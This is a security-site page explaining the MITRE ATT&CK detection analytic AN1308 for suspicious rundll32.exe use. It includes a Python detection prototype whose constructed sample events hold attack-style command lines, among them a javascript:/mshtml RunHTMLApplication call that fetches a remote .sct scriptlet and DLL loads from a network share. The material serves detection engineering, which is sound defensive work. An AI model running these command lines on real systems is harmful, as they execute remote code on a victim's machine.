AN1308: Analytic 1308
Detects rundll32.exe invoked with atypical arguments (.dll, .cpl, javascript:, mshtml). DLLs not normally loaded by rundll32 are mapped into memory. Control_RunDLL or RunHTMLApplication invoked. Suspicious DLLs or scripts accessed from disk or network. Rundll32 reaches out to external domains (e.g., fetching .sct or .hta).
Analyst context for executives and security teams
This analytic matters because rundll32.exe is a legitimate Windows utility, so an execution is hard to judge on its own; the signal lies in how it is launched, with unusual DLL, Control Panel, javascript:, mshtml, or network-retrieval arguments. For leaders, the practical issue is not the tool itself; it is whether the SOC can distinguish normal Windows and application activity from suspicious rundll32 behavior quickly enough to support containment decisions without overwhelming analysts with noise.
Executive priority
Prioritize this as a Windows monitoring and response-readiness validation item. Security leaders should ask whether endpoint telemetry captures rundll32 command lines, loaded modules, script or DLL access from disk and network locations, and outbound domain activity. This is useful evidence for incident response, managed detection quality, and audit discussions around endpoint visibility and suspicious system-utility execution. Because ATT&CK supplied no tactic mapping or relationships, treat it as a detection-control validation rather than a standalone risk assertion.
Technical view
Validate detection logic for rundll32.exe executions with atypical arguments including .dll, .cpl, javascript:, and mshtml indicators; invocations of Control_RunDLL or RunHTMLApplication; DLLs not normally loaded by rundll32 being mapped into memory; suspicious DLLs or scripts accessed from local or network paths; and rundll32 outbound connections to external domains, including retrieval of .sct or .hta content. Tune against known enterprise software, Control Panel activity, and administrative tooling to reduce false positives. Since no official detection logic is provided, teams must translate the description into local endpoint, process, module-load, file, script, and network analytics.
Likely telemetry
- Windows process creation events with full command line for rundll32.exe
- Parent and child process context for rundll32.exe
- DLL/module load telemetry showing libraries mapped into rundll32 memory
- File access telemetry for DLL, CPL, script, .sct, and .hta content from disk or network locations
- Network connection and DNS/proxy telemetry for rundll32.exe outbound activity to external domains
Detection direction
- Confirm rundll32.exe command-line capture is enabled and searchable on Windows endpoints.
- Build or validate rules for atypical rundll32 arguments: .dll, .cpl, javascript:, mshtml, Control_RunDLL, and RunHTMLApplication.
- Correlate process execution with module loads and file/network access to distinguish benign Control Panel or application behavior from suspicious DLL or script loading.
- Review allowlists carefully; broad rundll32 exclusions can hide the very behavior this analytic is meant to surface.
- Tune for known administrative and software-management activity to avoid excessive false positives.
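As an added, runnable example (not part of the ATT&CK object or of Glexia's page), the following Python applies the command-line indicators listed above to a handful of constructed Sysmon-style process-creation records and shows how a narrow allowlist differs from a broad one. The field names, the SAMPLE_EVENTS, the severity buckets and both allowlist functions are this example's assumptions. It covers only the command-line part of the analytic; the module-load and outbound-connection checks need the telemetry listed under Likely telemetry and are not modelled here.

```python
"""Prototype of the AN1308 command-line checks over constructed process-creation records.

Field names follow the Sysmon Event ID 1 convention (Image, CommandLine, ParentImage).
SAMPLE_EVENTS are constructed for this example and are not real telemetry.
"""
import ntpath
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Command-line indicators named in the analytic description (case-insensitive).
INDICATORS = {
    "javascript_scheme":   re.compile(r"javascript:", re.I),
    "mshtml":              re.compile(r"mshtml", re.I),
    "runhtmlapplication":  re.compile(r"RunHTMLApplication", re.I),
    "control_rundll":      re.compile(r"Control_RunDLL", re.I),
    "remote_script_fetch": re.compile(r"https?://\S+?\.(?:sct|hta)\b", re.I),
}
# Every .dll/.cpl argument on the command line: bare name, local path or UNC path.
MODULE_ARG = re.compile(r'((?:\\\\|[a-z]:\\)?[^"\s,]+\.(?:dll|cpl))\b', re.I)
# Assumed severity bucket: any of these alone is worth an immediate look.
HIGH = {"javascript_scheme", "runhtmlapplication", "remote_script_fetch", "module_from_network"}

R32 = r"C:\Windows\System32\rundll32.exe"
SAMPLE_EVENTS = [  # constructed records; indices are referenced in the usage note
    {"Image": R32, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'rundll32.exe shell32.dll,Control_RunDLL "C:\Windows\System32\intl.cpl"'},
    {"Image": R32, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";'
                    r'document.write();GetObject("script:http://example.invalid/a.sct")'},
    {"Image": R32, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"rundll32.exe \\10.0.0.5\share\update.dll,#1"},
    {"Image": R32, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\helper.dll,Start"},
    {"Image": R32, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"rundll32.exe url.dll,OpenURL http://example.invalid/x.hta"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
    {"Image": R32, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\Public\unknown.cpl"},
    {"Image": R32, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\davclnt.dll,DavSetCookie"},
]


def module_origin(path):
    """Classify where a DLL/CPL argument would be loaded from."""
    low = path.lower()
    if low.startswith("\\\\"):
        return "network_share"
    if low.startswith(SYSTEM_DIRS):
        return "system_dir"
    if "\\" not in low:
        return "bare_name"  # resolved through the loader search order
    return "non_system_path"


def evaluate(event):
    """Return the set of indicator names that fire for one process-creation event."""
    if ntpath.basename(event["Image"]).lower() != "rundll32.exe":
        return set()
    cmd = event["CommandLine"]
    tags = {name for name, rx in INDICATORS.items() if rx.search(cmd)}
    origins = {module_origin(p) for p in MODULE_ARG.findall(cmd)}
    if "network_share" in origins:
        tags.add("module_from_network")
    if "non_system_path" in origins:
        tags.add("module_outside_system_dirs")
    return tags


def is_baseline_control_panel(event, tags):
    """Narrow allowlist: explorer/control launching Control_RunDLL on a System32 .cpl only."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    cpls = [p for p in MODULE_ARG.findall(event["CommandLine"]) if p.lower().endswith(".cpl")]
    return bool(tags <= {"control_rundll"} and parent in ("explorer.exe", "control.exe")
                and cpls and all(module_origin(p) == "system_dir" for p in cpls))


def is_any_explorer_child(event, tags):
    """Broad exclusion of the kind warned about above: hides everything explorer.exe spawns."""
    return ntpath.basename(event["ParentImage"]).lower() == "explorer.exe"


def scan(events, allow=is_baseline_control_panel):
    """Return (event index, severity, sorted tags) for every event that should alert."""
    findings = []
    for i, ev in enumerate(events):
        tags = evaluate(ev)
        if not tags or allow(ev, tags):
            continue
        findings.append((i, "high" if tags & HIGH else "medium", sorted(tags)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

With the narrow allowlist, records 1, 2, 3, 4 and 6 alert and record 0 (a System32 Control Panel applet launched from explorer.exe) is suppressed; with the broad explorer.exe exclusion, record 6 (Control_RunDLL on a .cpl under C:\Users\Public, also launched from explorer.exe) disappears as well, which is exactly the kind of gap the allowlist review above is meant to catch. The bare-name case (shell32.dll, url.dll) is left untagged here because resolving it requires the module-load telemetry, not the command line.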
Mitigation priorities
- Ensure Windows endpoint logging or EDR policy captures process command line, module loads, file access, and process-scoped network activity relevant to rundll32.exe.
- Establish baselines for legitimate rundll32 usage in the organization, including common Control Panel and application-driven invocations.
- Harden response playbooks so analysts know when to collect command line, loaded DLLs, accessed files, network destinations, and parent-process context.
- Use change control and software inventory context to separate expected application behavior from unusual rundll32 execution patterns.
- Review detection exceptions periodically, especially any exclusions involving rundll32.exe, DLL loading, script content, or external network access.
Analyst notes and limits
ATT&CK identifies this as detection analytic AN1308 for Windows and describes suspicious rundll32.exe invocation patterns, memory-mapped DLL behavior, local or network script/DLL access, and outbound external-domain activity. There are no supplied relationships, aliases, labels, tactics, or official detection query, so the Glexia interpretation is focused on validation of telemetry and analytic engineering rather than attribution or campaign context.
This take is based only on the supplied ATT&CK STIX fields and external reference. No active exploitation, actor usage, impact, technique relationship, or guaranteed detection coverage is provided. Local environment baselines are required to determine what rundll32 behavior is normal and which events are actionable.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 123722e7e782… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN1308
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.